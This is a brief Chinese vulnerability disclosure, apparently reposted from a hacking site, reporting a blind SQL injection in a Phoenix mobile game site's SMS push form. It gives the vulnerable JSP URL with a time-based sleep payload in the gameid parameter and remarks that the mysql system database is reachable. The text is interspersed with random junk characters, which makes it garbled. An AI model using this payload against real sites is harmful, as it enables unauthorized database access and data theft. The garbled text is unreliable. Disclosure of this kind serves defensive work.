简要描述:
2 T9 V- F4 q( V- I, c; C凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。& Q# l: ~' I' \; u2 s4 ?' f% ^, Z
" | @0 G1 W* g+ Z2 i3 x
详细说明:5 F; `9 M) _5 h+ J' P
存在SQL盲注url:
/ e2 G+ O. h4 U9 v0 `8 M2 Tfenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1/ B; H: n9 _: N
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png+ d \8 a; f$ I/ F0 x2 C* k
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png8 X% j2 N/ C, ?# ?' Y
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
) d1 A8 I0 i$ Y% H: D
" N# e5 ^/ n3 T0 M- J0 Z能看到mysql系统数据库,看来user权限应该很高的。。 |